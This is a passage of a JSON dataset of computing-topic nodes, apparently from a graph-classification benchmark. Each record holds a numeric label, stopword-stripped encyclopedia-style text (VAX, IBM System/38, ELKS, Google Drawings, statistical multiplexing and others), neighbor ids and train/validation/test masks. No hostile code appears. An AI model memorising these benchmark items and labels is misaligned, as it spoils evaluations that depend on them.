slot access defmethod student-age self student defmethod setf student-age new-age self student defmethod set-student-number new-number self student supports getter setter function syntax version 2 language getter setter class/struct methods codice_23 attribute codice_24 instance used like simple class delphi language illustrates concept public property access private field example simple class representing student name stored one see variable name private i.e visible student class setter getter public namely codice_25 codice_26 methods example constructor-function codice_24 used create objects representing student name stored non-standard use prototypes inheritance ecma-6 without using prototypes ecma-6 using defineproperty using traditional objective-c 1.0 syntax manual reference counting one working gnustep ubuntu 12.04 using newer objective-c 2.0 syntax used mac os x 10.6 ios 4 xcode 3.2 generating code described starting os x 10.8 ios 6 using xcode 4.4 syntax even simplified using class :accessor using moose object system example simple class representing student name stored one see variable name private i.e visible student class setter getter public namely codice_25 codice_29 methods example uses python class one variable getter setter racket object system way organize code comes addition modules units rest language object system first-class values lexical scope used control access objects methods struct definitions alternative way define new types values mutators present explicitly required ruby individual accessor mutator methods may defined metaprogramming constructs codice_30 codice_31 may used declare private variable class provide either read-only read-write public access respectively defining individual accessor mutator methods creates space pre-processing validation data read-only simple public access implied codice_32 variable read-write simple public access implied codice_32 variable example illustrates vb.net idea properties used classes similar c explicit use codice_34 codice_35 methods vb.net 2010 auto implemented properties utilized create property without use get set syntax note hidden variable created compiler called codice_36 correspond property codice_12 using another variable within class named codice_36 would result error privileged access underlying variable available within class",
    "neighbors": [
      2048,
      3076,
      10980,
      11430,
      7273,
      522,
      2666,
      3948,
      5165,
      10478,
      6160,
      2737,
      7292,
      8304,
      1973,
      9877,
      2556,
      9245
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11590,
    "label": 7,
    "text": "Google_Drawings:google drawings google drawings free web-based diagramming software developed google allows users collaborate work together real time create flowcharts organisational charts website wireframes mind maps concept maps types diagrams google drawings also available chrome app works offline available chrome web store google drawings hosted within google drive files created application default saved google drive originally introduced april 12 2010 google docs drawings tool making drawings google docs google drawings allows multiple users open edit drawings simultaneously real time contains subset features google slides different templates users insert images local hard drive web well shapes arrows scribbles text google drawings set flow-chart symbols shapes dragged dropped place users move resize rotate objects use polylines line connectors also allows editing images including cropping applying masks adding borders features include laying drawings precisely alignment guides snapping grid auto-distribution drawings inserted google documents spreadsheets presentations also published online images downloaded standard formats jpeg svg png pdf",
    "neighbors": [
      4096,
      1409,
      4995,
      5892,
      8455,
      7816,
      9610,
      5262,
      8719,
      3600,
      6800,
      5522,
      1427,
      5524,
      7700,
      10645,
      11408,
      10009,
      8858,
      1435,
      9244,
      10393,
      798,
      10525,
      288,
      7841,
      2978,
      4901,
      1959,
      3499,
      7595,
      10284,
      3633,
      1203,
      5431,
      2875,
      10045,
      7359,
      196,
      3269,
      3782,
      11592,
      4683,
      4044,
      10445,
      9039,
      3664,
      3409,
      4048,
      3795,
      11343,
      1240,
      7548,
      8285,
      8413,
      6367,
      9949,
      2658,
      6632,
      5483,
      236,
      5100,
      9712,
      9970,
      8821,
      7926,
      3836
    ],
    "mask": "Test"
  },
  {
    "node_id": 11591,
    "label": 5,
    "text": "Statistical_time-division_multiplexing:statistical time-division multiplexing statistical multiplexing type communication link sharing similar dynamic bandwidth allocation dba statistical multiplexing communication channel divided arbitrary number variable bitrate digital channels data streams link sharing adapted instantaneous traffic demands data streams transferred channel alternative creating fixed sharing link general time division multiplexing tdm frequency division multiplexing fdm performed correctly statistical multiplexing provide link utilization improvement called statistical multiplexing gain statistical multiplexing facilitated packet mode packet-oriented communication among others utilized packet switched computer networks stream divided packets normally delivered asynchronously first-come first-served fashion alternative fashion packets may delivered according scheduling discipline fair queuing differentiated and/or guaranteed quality service statistical multiplexing analog channel example wireless channel also facilitated following schemes statistical multiplexing normally implies on-demand service rather one preallocates resources data stream statistical multiplexing schemes control user data transmissions time domain statistical multiplexing packet mode communication similar time-division multiplexing tdm except rather assigning data stream recurrent time slot every tdm data stream assigned time slots fixed length data frames variable lengths often appear scheduled randomized order experience varying delay delay fixed tdm statistical multiplexing allows bandwidth divided arbitrarily among variable number channels number channels channel data rate fixed tdm statistical multiplexing ensures slots wasted whereas tdm waste slots transmission capacity link shared users packets static tdm circuit switching carried physical layer osi model tcp/ip model statistical multiplexing carried data link layer statistical multiplexing packet frame contains channel/data stream identification number case datagram communication complete destination address information examples statistical multiplexing digital audio video broadcasting example statistical multiplexer content aggregating device allows broadcasters provide greatest number audio video services given bandwidth sharing pool fixed bandwidth among multiple services streams varying bitrates multiplexer allocates service bandwidth required real-time needs services complex scenes receive bandwidth services less complex ones bandwidth sharing technique produces best video quality lowest possible aggregate bandwidth examples statistical multiplexers include rgb networks bnpxr product line harmonic inc. prostream electra vos product families motorola terayon dm6400 tmir",
    "neighbors": [
      3847,
      9863,
      2057,
      2701,
      1550,
      11413,
      2458,
      5020,
      5664,
      7723,
      10924,
      11181,
      1969,
      2994,
      7865,
      7490,
      8386,
      3140,
      5321,
      7498,
      2911,
      3168,
      7400,
      2793,
      2802,
      2294
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11592,
    "label": 7,
    "text": "Google_for_Education:google education google education service google provides independently customizable versions several google products using domain name provided customer features several web applications similar functionality traditional office suites including gmail hangouts google calendar drive docs sheets slides groups news play sites vault products also tie use chromebooks added g suite domain educational establishment google apps education google apps non-profits accredited 501 c 3 non-profit entities free offer amount storage google apps work accounts addition shared apps calendar docs etc google provides google apps marketplace app store google apps users contains various apps free paid installed customize google education experience user",
    "neighbors": [
      4995,
      5892,
      7816,
      5262,
      8719,
      5524,
      7700,
      10645,
      8858,
      1435,
      10525,
      2978,
      4901,
      1959,
      3499,
      10284,
      1203,
      5431,
      7359,
      196,
      3269,
      3782,
      11590,
      4683,
      11343,
      3664,
      3795,
      1240,
      8413,
      6367,
      2658,
      6632,
      5483,
      236,
      9712,
      9970,
      8821,
      3836
    ],
    "mask": "None"
  },
  {
    "node_id": 11593,
    "label": 2,
    "text": "IBM_RSCT:ibm rsct ibm reliable scalable cluster technology rsct set software components together provide comprehensive clustering environment aix linux solaris windows operating systems rsct infrastructure used variety ibm products provide clusters improved system availability scalability ease use follows list main rsct components management domains peer domains set nodes configured manageability monitoring called management domain cluster set nodes configured high availability called rsct peer domain cluster peer domain set nodes consistent knowledge existence resources shared among node within peer domain rmc depends core set cluster services include topology services group services cluster security services management domain set nodes resources managed monitored one nodes designated management control point mcp nodes considered managed nodes topology services group services used management domain order understand various rsct components used cluster aware nodes cluster configured manageability high availability",
    "neighbors": [
      3323,
      5492
    ],
    "mask": "None"
  },
  {
    "node_id": 11594,
    "label": 4,
    "text": "Asset_(computer_security):asset computer security information security computer security network security asset data device component environment supports information-related activities assets generally include hardware e.g servers switches software e.g mission critical applications support systems confidential information assets protected illicit access use disclosure alteration destruction and/or theft resulting loss organization goal information security ensure confidentiality integrity availability assets various threats example hacker might attack system order steal credit card numbers exploiting vulnerability information security experts must assess likely impact attack employ appropriate countermeasures case might put firewall encrypt credit card numbers performing risk analysis important weigh much spend protecting asset cost losing asset also important take account chance loss occurring intangible costs must also factored hacker makes copy company credit card numbers cost anything directly loss fines reputation enormous",
    "neighbors": [
      1088,
      3552,
      612,
      5636,
      8998,
      1479,
      939,
      7979,
      5327,
      11567,
      3473,
      4689,
      2324,
      3125,
      1369,
      5373,
      2558
    ],
    "mask": "Train"
  },
  {
    "node_id": 11595,
    "label": 1,
    "text": "Bitcask:bitcask bitcask erlang application provides api storing retrieving key/value data log-structured hash table design owes lot principles found log-structured file systems draws inspiration number designs involve log file merging bitcask number advantages owing write-once append-only on-disk data-format use in-memory hash-table keys lookups bitcask keeps keys memory times system must enough memory contain entire keyspace addition operational components operating system file-system buffers",
    "neighbors": [
      6851,
      5380,
      5356,
      7983,
      19,
      823,
      9151
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11596,
    "label": 3,
    "text": "IBM_System/38:ibm system/38 system/38 minicomputer midrange computer server platform manufactured sold ibm corporation system offered number innovative features brainchild frank soltis glenn henry ibm announced system/38 1978 developed code-name pacific made commercially available august 1979 system/38 oriented toward multi-user system environment typical system handled dozen several dozen terminals midrange predecessors system/38 included system/3 system/32 system/34 system/38 offered capacity previous system/34 system/38 chronologically preceded system/36 successor system/34 system/38 nearly called system/380 as/400 nearly called system/40 system/38 superseded as/400 also supported system/36 data programs fairly large extent exceptions as/400 primarily re-marketing system/38 updates operating system including luxurious non-trivial expansion source object names 8 new 10 characters maximum s/38 programs 'observability intact source code embedded within compiled binary executive expense larger compiled object sizes still run as/400 successor systems restore option incorporates recompile back-version source however proprietary vendor application libraries objects compiled without 'observability required original vendor replacement consequent expense upgrading as/400 pricing time tiered exact software priced based upon model speed capacity system installed upon as/400 evolved iseries turn evolved system although 'evolution include significant enhancements hardware operating system capabilities name change usually considered evolution marketing system/38 legacy lives enterprise-class ibm power systems series superseded system 2008 run ibm well aix linux contrast competing proprietary computing architectures early 1980s wang vs hewlett packard hp 3000 long discontinued without compatible upgrade path ibm 5381 system unit contained processor main memory disk storage diskette magazine drive system console keyboard display 5381 available model 100 model 200 ibm 5382 system unit physically identical 5381 powerful processors memory disk storage 5382 available models 300 400 500 600 700 hindsight system/38 architecture probably demanding hardware era first launched struggled overhead software operating system consumed almost 60 mb disk vast sum time leading wags suggest pre-announce code name series pacific actually acronym meaning performance ai n't critical function complete system included central processing unit 512k 768k 1024k 1280k 1536k bytes main storage included memory management unit supporting demand paging used system software implement single-level store architecture system/38 console included keyboard display screen 16 lines 64 characters inconsistent locally attached 5250 terminals either 12x40 24x80 depending model keyboard used system operator entering control language commands diskette magazine drive standard models operating system system/38 called cpf control program facility cpf related ssp operating system ibm system/34 system/36 cpf objects files programs message queues user profiles libraries system/38 also distinction first commercially available ibm midrange computer database management system dbms integrated operating system operational control language system/38 called cl control language cl programs similar concept shell scripts could compiled executed natively system/38 48-bit addressing unique time novel integrated database system system/38 also security built part architecture object library could access controlled user-by-user basis continued expanded throughout as/400 iseries computer lines system/38 descendants commercial computers ever use machine interface architecture isolate application software operating system hardware dependencies including details address size register size compilers system/38 successors generate code high-level instruction set originally called mi machine interface renamed timi technology independent machine interface as/400 mi/timi virtual instruction set instruction set underlying cpu unlike virtual-machine architectures virtual instructions interpreted runtime see p-code machine mi/timi instructions never interpreted constitute intermediate compile time step translated processor instruction set final compilation step mi/timi instructions stored within final program object addition executable machine instructions program moved processor one native instruction set processor another native instruction set mi/timi instructions re-translated native instruction set new machine program executed first time new machine result possible program originally developed system/38 run current ibm hardware without ever recompiled capability allowed as/400 migrate cisc complex instruction set computer risc reduced instruction set computer 1990s mi/timi instructions existed compiled program relatively simple re-translation created new program native new hardware 1986 system/38 announced support distributed data management architecture ddm middleware context distributed system software layer lies operating system applications distributed data management architecture defines environment sharing data enabled system/38 programs create manage access record-oriented files remote system/36 system/38 ibm mainframe systems running cics also allowed programs remote system/36 system/38 computers create manage access files system/38 languages supported system/38 included rpg iii cobol basic pl/i decades later software originally dismissed critics momentary aberration runs better ever many thousands modern iseries ibm/i systems within commercial government enterprises types sizes ibm sold estimated 20,000 system/38s within first five years availability according articles published industry magazines news 34/38 midrange computing although billed minicomputer s/38 much expensive ibm established best-selling system/34 replacement system/36 equal importance difficulty upgrading say system/34 s/38 although machines similarities twinax peripherals rpg programming languages reality different ibm tacitly acknowledged bringing system/36 – upgraded system/34 – launch s/38 marketplace ibm thus found three overlapping incompatible ranges system/34/36 system/38 mainframe /360 architecture system/38 originally designed replace digital equipment corporation time one ibm main competitors able exploit offering wide range products based single architecture ibm counter 9370 'baby mainframe commercial failure",
    "neighbors": [
      256,
      2179,
      7941,
      2951,
      2314,
      10387,
      7188,
      11539,
      6813,
      3999,
      1952,
      290,
      10146,
      8868,
      10413,
      8751,
      8502,
      823,
      7480,
      1593,
      1469,
      10813,
      4034,
      4546,
      964,
      8262,
      4424,
      8136,
      7884,
      2638,
      10835,
      2901,
      86,
      728,
      2399,
      8551,
      5483,
      1776,
      6128,
      2804,
      3700,
      10614,
      375,
      3323,
      5503
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11597,
    "label": 7,
    "text": "Nebula_(company):nebula company nebula inc. hardware software company offices mountain view california seattle washington usa nebula developed nebula one cloud computing hardware appliance turned racks standard servers private cloud nebula one private cloud system built openstack open source cloud framework well many open source software projects nebula founded “ fourth paradigm development march 2011 former nasa ames research center chief technology officer chris c. kemp long-time colleague devin carlen entrepreneur steve o'hara software engineer tres henry formerly amazon web services author aws console named head user experience may 2011 nebula closed round series investment led kleiner perkins caufield byers highland capital partners participation google first three investors—andy bechtolsheim ram shriram david cheriton well investors summer 2012 eight members original anso labs acquired rackspace nasa team originally wrote components openstack project joined nebula fall 2012 nebula closed 25 million series b investment led comcast ventures highland capital google executive eric schmidt ’ venture fund innovation endeavors became investor february 2013 silicon india named kemp one ten pioneers cloud computing march 2013 nebula named one cio.com 10 hot cloud companies watch nebula one made generally available april 2 2013 april 1 2015 company announced website confirmed twitter ceasing operations",
    "neighbors": [
      7248,
      4194,
      3819
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11598,
    "label": 4,
    "text": "FastBack:fastback fastback software application developed late 1980s early 1990s backing ibm pc macintosh computers originally written fifth generation systems inc company located baton rouge louisiana company wanted expand apple market purchased rebranded product touchstone software corporation original fastback unique industry able read computer hard drive write floppy drive simultaneously using full capability dual-channel dma chip found personal computers time combined compression techniques proprietary disk format got data floppy disk made fastback one fastest pc backup programs time 1984 fastback version 5.13 already market 1987 fastback plus 1.0 dos released version subsequent dos versions released unconditional guarantee harm resulting use software terms conditions guarantee contrasted industry norms 1991 fastback plus 3.02 dos released february 1992 company released fastback plus 1.0 windows written pcs running windows 3.0 fastback plus 2.0 included novell dos 7 1994 fastback ii bundled drive 2.4 provide read/write compatibility macintosh 3.5 floppy disk formats new york times wrote standard dos msbackup utility automatically awaken 3 a.m. make full backup onto quarter-inch cassette drive byte 1989 listed fastback plus among distinction winners byte awards stating hard drive recommend package",
    "neighbors": [
      576,
      3841,
      3366,
      7847,
      7983,
      178
    ],
    "mask": "Train"
  },
  {
    "node_id": 11599,
    "label": 9,
    "text": "Tombstone_diagram:tombstone diagram computing tombstone diagrams t-diagrams consist set “ puzzle pieces ” representing compilers related language processing programs used illustrate reason transformations source language left target language right realised implementation language bottom commonly found describing complicated processes bootstrapping porting self-compiling compilers interpreters macro-processors t-diagrams first introduced describing bootstrapping cross-compiling compilers mckeeman et al 1971 melvin conway described broader concept uncol 1958 bratman added 1961 later others including p.d terry gave explanation usage t-diagrams textbooks topic compiler construction t-diagrams also used describe client-server interconnectivity world wide web teaching tool tdiag implemented leipzig university germany",
    "neighbors": [
      6242,
      428,
      8973,
      2045,
      7421
    ],
    "mask": "None"
  },
  {
    "node_id": 11600,
    "label": 8,
    "text": "Common_Base_Event:common base event common base event cbe ibm implementation web services distributed management wsdm event format standard ibm also implemented common event infrastructure unified set apis infrastructure creation transmission persistence distribution wide range business system network common base event formatted events",
    "neighbors": [
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 11601,
    "label": 2,
    "text": "Hobbyist_operating_system_development:hobbyist operating system development hobbyist operating system development one involved technical options computer hobbyist definition hobby operating system sometimes vague developer view developers fun learning also seen users view users using toy defined operating system n't big user base development begin existing resources like kernel operating system bootloader also made completely scratch development platform could bare hardware machine nature operating system developed tested virtual machine since hobbyist must claim ownership adapting complex system ever-changing needs technical terrain much enthusiasm common amongst many different groups attracted operating system development elements operating system development include c programming language frequently used hobby operating system programming well assembly language though languages used well use assembly language common small systems especially based eight bit microprocessors mos technology 6502 family zilog z-80 systems lack available resources small output size low-level efficiency hobby operating systems use command-line interface simple text user interface due ease development advanced hobby operating systems may graphical user interface example atheos hobby operating system graphical interface written entirely one programmer section predominantly x86 oriented term bios basic input/output system refers firmware initialises computer hardware provisions load operating system bios also sets standard interface several low-level device drivers boot time bios resources often used hobbyist operating systems especially written 16-bit x86 machines many hobby operating systems developers lack time write complex low level drivers simply want get writing software system soon possible commonly used bios functions videobios disk services used video cards disk drives vary significantly different machines specialised drivers often difficult write use bios uncommon operating systems operate protected mode long mode system must switch back real mode bios drivers run",
    "neighbors": [
      2560,
      6155,
      7187,
      10776,
      25,
      4637,
      9762,
      4643,
      6180,
      7217,
      10803,
      10809,
      576,
      2625,
      6221,
      3160,
      10333,
      97,
      11363,
      6760,
      10856,
      9835,
      7282,
      7285,
      4727,
      9335,
      634,
      1147,
      3197,
      1150,
      5247,
      11390,
      2179,
      10883,
      10891,
      6797,
      10382,
      6296,
      2201,
      9370,
      9882,
      671,
      9887,
      8879,
      178,
      9907,
      6837,
      6329,
      8889,
      5823,
      5312,
      8388,
      1736,
      2248,
      9932,
      5840,
      7382,
      8410,
      9436,
      1247,
      11489,
      7403,
      242,
      5363,
      9466,
      9468,
      1278,
      255,
      1804,
      273,
      8977,
      787,
      789,
      5397,
      10016,
      292,
      10235,
      2345,
      7983,
      2355,
      7477,
      823,
      4409,
      6459,
      7483,
      7999,
      11075,
      4423,
      5452,
      6988,
      5457,
      7507,
      7511,
      3426,
      8551,
      5484,
      7020,
      11635,
      5492,
      2933,
      376,
      8573,
      7039,
      8063,
      10113,
      8069,
      394,
      3978,
      4492,
      7057,
      11675,
      2462,
      5022,
      421,
      1445,
      935,
      4521,
      9643,
      4525,
      11184,
      5041,
      7601,
      10676,
      4024,
      6078,
      9151,
      11204,
      11205,
      4040,
      8136,
      9166,
      5080,
      477,
      10730,
      1515,
      10731,
      8687,
      6128,
      5105,
      499,
      5619,
      5115,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 11602,
    "label": 2,
    "text": "Ryan_C._Gordon:ryan c. gordon ryan c. gordon also known icculus computer programmer former loki software employee responsible icculus.org hosts many loki software projects well several new projects created others gordon site hosts projects duke nukem 3d shadow warrior quake iii arena many free open source projects multiple platforms gordon also created ports proprietary software products linux mac os x platforms include hired port unreal tournament series serious sam series official postal series tripwire interactive coffee stain studios titles prey 2006 also involved porting several non-gaming products second life google earth candy cruncher postal 2 published linux game publishing also described alongside edward rudd instrumental ensuring multi-platform nature humble indie bundle initiatives gordon grew outside philadelphia going college charlotte north carolina currently resides january 3 2010 became engaged girlfriend carrie married later year january 31 2012 wife gave birth first child olive finch gordon also founding member barebones theatre group charlotte summer 1999 loki software ran contest called loki hack atlanta linux showcase goal improving linux port gordon decided give try driving four-hour trip home atlanta loki impressed work decided offer job gordon quickly rose prominence loki working developer game ports quake iii arena eric ultimate solitaire well lead developer descent 3 2000 also wrote several articles online linux news information website linux.com around time founded icculus.org made provide hosting various free open source projects would later used support continue loki free software projects tools loki software gordon picked nickname icculus reference fictional character gamehendge song icculus phish upcoming closure loki forced seek outside employment friend offered job cybercafe forced move parents desperate escape working cash register living found e-mail address artist working developer croteam recently released highly successful serious sam series gordon asked would interested building linux port agreed port first beta released december 5 2002 gained contracts hired port devastation linux america army linux mac os x also contracted epic games port unreal tournament 2003 title linux mac os x port included packaged windows version business relationship continued release unreal tournament 2004 followed original unreal tournament ported linux internally epic published loki upon learning release postal 2 2003 gordon decided contact developer behind wondering would interested making port game linux mac os x. loki previously ported original postal linux interested keeping franchise compatible running scissors agreed finished port shipped february 14 2005 linux game publishing initially handling publishing linux version soon contracted make linux port wolfire games title business relationship would later prove fruitful gordon around time also contracted build linux client online virtual world second life google also utilized services contracted make native linux port google earth application linux functionality finally becoming available starting release version 4 beta june 12 2006 2007 contracted epic games port new unreal tournament 3 title linux mac os x linux game server released december 18 2007 work eventually abandoned linux mac os x clients reasons remain undisclosed october 2008 made surprise announcement working linux client first-person shooter game prey previously porting game linux server 2006 although speculation potential linux release denied developer title past finished port released december 7 2008 october 23 2009 announced plans make universal binary system similar one used mac os x linux systems called project generated considerable controversy several linux kernel developers decrying effort gordon announced project hold early november 2009 later stating would willing work receives help interested party around time also started port game aquaria linux bit blot may 11 2010 wolfire games released source code code branch lugaru gnu general public license also involved source code release aquaria sold part first humble indie bundle also hosted wolfire contracted port mac os x stating could potentially port linux steam ever released linux client gordon also generated controversy summer talk 2010 southeast linuxfest titled anatomy failure criticized aspects kernel development process ported braid linux mac os x allow part humble indie bundle 2 well porting games cogs hammerfight later bundles part ported haaf game engine linux mac os x released port free software license also ported frozen synapse linux included primary part frozen synapse bundle well super meat boy shank humble indie bundle 4 rest 2012 gordon would work several ports humble bundles including space pirates zombies psychonauts would also involved updating old releases well porting several new titles linux included part valve corporation steam linux launch including creating linux ports games red orchestra ostfront 41-45 killing floor tripwire interactive part humble indie bundle 7 promotion gordon ported title dungeon defenders linux making first linux native title utilize unreal engine 3 engine debuted release unreal tournament 3 back 2007 gordon unsuccessfully tried port platform 2013 ported dear esther linux included part humble indie bundle 8 gordon one speakers first ever steam dev days outlined port game linux steamos 2014 ported games goat simulator sanctum 2 linux mac os x coffee stain studios june 19 2014 released new linux port limbo game previously released linux using crossover wrapper part humble indie bundle v something proved controversial time due fully native release order accomplish gordon also port wwise audio middleware previously prevented native port possible icculus.org gordon personal website project incubator similar sourceforge.net ourproject.org gnu savannah gordon often involved projects hosted site universally site hosts port enhancement projects games aliens versus predator jump n bump donkey.bas duke nukem 3d shadow warrior freespace 2 descent 2 black shades ken labyrinth rise triad wolfenstein 3d heretic cooperative rune quake ii build engine unreal unreal tournament mod chzo mythos site also hosts free software projects neverball ioquake3 related projects attempted visual basic re-implementation openal mac os x yahoo messenger client also host freeware project hosted code developers blazing games piga software wolfire games bit blot following list software gordon involved porting except game server ports addition also contracted provide technical assistance gaslamp games developers dungeons dredmor clockwork empires helped develop solely responsible linux os x ports double fine productions costume quest",
    "neighbors": [
      1026,
      5644,
      6797,
      4367,
      8848,
      657,
      10642,
      1939,
      2581,
      3478,
      6808,
      2841,
      7450,
      10525,
      6302,
      7584,
      162,
      802,
      5410,
      6691,
      6947,
      8354,
      5931,
      8364,
      1717,
      823,
      2109,
      11069,
      10687,
      2368,
      10822,
      8263,
      843,
      589,
      847,
      6352,
      4177,
      8787,
      4437,
      6489,
      3802,
      4831,
      9696,
      11232,
      2149,
      10480,
      7793,
      1394,
      1396,
      3189,
      11643,
      2685
    ],
    "mask": "None"
  },
  {
    "node_id": 11603,
    "label": 3,
    "text": "Embeddable_Linux_Kernel_Subset:embeddable linux kernel subset embeddable linux kernel subset elks formerly known linux-8086 unix-like operating system kernel subset linux kernel intended 16-bit computers limited processor memory resources machines powered intel 8086 compatible microprocessors supported 32-bit linux elks free software available gnu general public license gpl work early 16-bit x86 8086 80186 80286 computers like ibm pc compatible systems virtual 8086 mode feature 32-bit intel 80386 later cpus found newer machines another useful area single board microcomputers intended educational tools homebrew projects hardware hacking well embedded controller systems e.g automation elks also runs psion 3a 3ar sibo sixteen bit organiser pdas nec v30 cpus providing another possible field operation gadget hardware ported platform effort called elksibo native elks programs may run emulated elksemu allowing 8086 code used linux-i386 effort provide elks eiffel compliant library also exists development linux-8086 started 1995 linux kernel developers alan cox chad page fork standard linux early 1996 project renamed elks embeddable linux kernel subset 1997 first website www.elks.ecs.soton.ac.uk/ offline created elks version 0.0.63 followed august 8 year june 22 1999 elks release 0.0.77 available first version able run graphical user interface nano-x window system july 21 elks booted psion pda sibo architecture elks 0.0.82 came january 10 2000 including sibo port became first official version running computer hardware original 8086 base march 3 year project registered sourceforge new website elks.sourceforge.net january 6 2001 cox declared elks basically dead nonetheless release 0.0.84 came along june 17 2001 charilaos harry kalogirou added tcp/ip networking support seven days later year elks reached 0.0.90 november 17 april 20 2002 kalogirou added virtual memory support disk swapping capability followed nine days later elks release 0.1.0 considered first beta version end year december 18 ede elks distribution edition distribution based elks kernel version 0.0.5 released january 6 2003 brought elks 0.1.2 update 0.1.3 followed may 3 2006 first official release long hiatus development development flightlinux real-time operating system spacecrafts planned project intended uosat-12 eventually settled qcf operating system quadron corporation instead since january 2012 elks development cvs repository migrated git february 2012 numerous patches linux-8086 mailing list committed new repository version 0.1.4 came february 19 2012 released jody bruchon memory riley williams former co-developer included updated floppy disk images fixing compilation bugs previous version removing unused codes may 10 2012 busyelks added repository jody bruchon attempt replace stand-alone binaries take advantage shared code elks support shared libraries busybox-like binaries attempt save space symbolic links eliminating redundant chunks code combining separate programs one bigger binary november 14 2013 project development moved github ethernet fat support added 2017 30 developers contributed project since fork 1995 march 2015 development elks project active reaching milestone 1,000 source code commits march 8 2015 june 2018 many bug fixes improvements performed 583 commits leading 0.2.1 release march 2019 project completed transition obsolete bcc compiler recent gcc-ia16",
    "neighbors": [
      10851,
      516,
      3911,
      4871,
      6730,
      8268,
      2925,
      6129,
      5363,
      2804,
      5397,
      11221,
      823,
      7483
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11604,
    "label": 3,
    "text": "VAX:vax vax discontinued instruction set architecture isa developed digital equipment corporation dec mid-1970s vax-11/780 introduced october 25 1977 first range popular influential computers implementing architecture 32-bit system complex instruction set computer cisc architecture based dec earlier pdp-11 vax virtual address extension designed extend replace dec various programmed data processor pdp isas vax architecture primary features virtual addressing example demand paged virtual memory orthogonal instruction set vax perceived quintessential cisc isa large number assembly-language-programmer-friendly addressing modes machine instructions highly orthogonal architecture instructions complex operations queue insertion deletion polynomial evaluation historically one studied commented-on isa computer history vax succeeded dec alpha instruction set architecture name vax originated acronym virtual address extension vax seen 32-bit extension older 16-bit pdp-11 prime computer early adopter virtual memory manage larger address space early versions vax processor implement compatibility mode emulates many pdp-11 instructions giving 11 vax-11 highlight compatibility later versions offloaded compatibility mode less used cisc instructions emulation operating system software vax instruction set designed powerful orthogonal introduced many programs written assembly language programmer-friendly instruction set important time programs written higher-level language instruction set became less visible ones much concerned compiler writers one unusual aspect vax instruction set presence register masks start subprogram arbitrary bit patterns specify control passed subprogram registers preserved since register masks form data embedded within executable code make linear parsing machine code difficult complicate optimization techniques applied machine code native vax operating system digital vax/vms renamed openvms 1991 early 1992 ported alpha modified comply posix standards branded compliant xpg4 x/open consortium vax architecture openvms operating system engineered concurrently take maximum advantage initial implementation vaxcluster facility vax operating systems included various releases bsd unix 4.3bsd ultrix-32 vaxeln xinu recently netbsd openbsd supported various vax models work done porting linux vax architecture openbsd discontinued support architecture september 2016 first vax model sold vax-11/780 introduced october 25 1977 digital equipment corporation annual meeting shareholders bill strecker c. gordon bell doctoral student carnegie mellon university responsible architecture many different models different prices performance levels capacities subsequently created vax superminicomputers popular early 1980s vax-11/780 used standard cpu benchmarks initially described one-mips machine performance equivalent ibm system/360 ran one mips system/360 implementations previously de facto performance standards actual number instructions executed 1 second 500,000 led complaints marketing exaggeration result definition vax mips speed vax-11/780 computer performing 27 vax mips would run program roughly 27 times faster vax-11/780 within digital community term vup vax unit performance common term mips compare well across different architectures related term cluster vups informally used describe aggregate performance vaxcluster performance vax-11/780 still serves baseline metric brl-cad benchmark performance analysis suite included brl-cad solid modeling software distribution vax-11/780 included subordinate stand-alone lsi-11 computer performed microcode load booting diagnostic functions parent computer dropped subsequent vax models enterprising vax-11/780 users could therefore run three different digital equipment corporation operating systems vms vax processor hard drives either rsx-11s rt-11 lsi-11 single density single drive floppy disk vax went many different implementations original vax 11/780 implemented ttl filled four-by-five-foot cabinet single cpu cpu implementations consisted multiple ecl gate array macrocell array chips included vax 8600 8800 superminis finally vax 9000 mainframe class machines cpu implementations consisted multiple mosfet custom chips included 8100 8200 class machines vax 11-730 725 low-end machines built using bit-slice components microvax represented major transition within vax family time design yet possible implement full vax architecture single vlsi chip even vlsi chips later done v-11 cpu vax 8200/8300 instead microvax first vax implementation move complex vax instructions packed decimal related opcodes emulation software partitioning substantially reduced amount microcode required referred microvax architecture microvax alu registers implemented single gate-array chip rest machine control conventional logic full vlsi microprocessor implementation microvax architecture arrived microvax ii 78032 dc333 cpu 78132 dc335 fpu 78032 first microprocessor on-board memory management unit microvax ii based single quad-sized processor board carried processor chips ran microvms ultrix-32 operating systems machine featured 1 mb on-board memory q22-bus interface dma transfers microvax ii succeeded many microvax models much improved performance memory vlsi vax processors followed form v-11 cvax cvax soc system chip single-chip cvax rigel mariah nvax implementations vax microprocessors extended architecture inexpensive workstations later also supplanted high-end vax models wide range platforms mainframe workstation using one architecture unique computer industry time sundry graphics etched onto cvax microprocessor die phrase cvax ... care enough steal best etched broken russian play hallmark cards slogan intended message soviet engineers known purloining dec computers military applications reverse engineering chip design dec product offerings vax architecture eventually superseded risc technology 1989 dec introduced range workstations servers ran ultrix decstation decsystem respectively based processors implemented mips architecture 1992 dec introduced risc instruction set architecture alpha axp later renamed alpha alpha-based microprocessor decchip 21064 high performance 64-bit design capable running openvms august 2000 compaq announced remaining vax models would discontinued end year 2005 manufacturing vax computers ceased old systems remain widespread use stromasys charon-vax simh software-based vax emulators remain available vax virtual memory divided four sections one gigabyte context addressing 2 bytes size vms p0 used user process space p1 process stack s0 operating system s1 reserved vax four hardware implemented privilege modes vax supports many addressing modes literal register postincrement predecrement register deferred postincrement deferred predecrement deferred displacement byte word long displacement byte word long deferred also indexed may combined many immediate mode synonymous program counter pc postincrement many addressing modes could use program counter also r15 instead registers provided easy generation position-independent code pc-relative addressing vax also load effective address instructions access memory compute address used first vax-based system vax-11/780 member vax-11 family high-end vax 8600 replaced vax-11/780 october 1984 joined entry-level microvax minicomputers vaxstation workstations mid-1980s microvax superseded vax 4000 vax 8000 superseded vax 6000 late 1980s mainframe-class vax 9000 introduced early 1990s fault-tolerant vaxft introduced alpha compatible vax 7000/10000 variant various vax-based systems sold vaxserver cancelled systems include bvax high-end ecl-based vax two ecl-based vax models argonaut raven raven cancelled 1990 vax known gemini also cancelled fall-back case lsi-based scorpio failed never shipped number vax clones authorized unauthorized produced examples include",
    "neighbors": [
      7173,
      9739,
      2062,
      9231,
      9742,
      2066,
      6675,
      7699,
      8725,
      5655,
      10779,
      8732,
      10781,
      9759,
      10786,
      6181,
      8231,
      10796,
      3630,
      5678,
      4144,
      6705,
      7218,
      2617,
      2623,
      577,
      2113,
      7234,
      1606,
      3142,
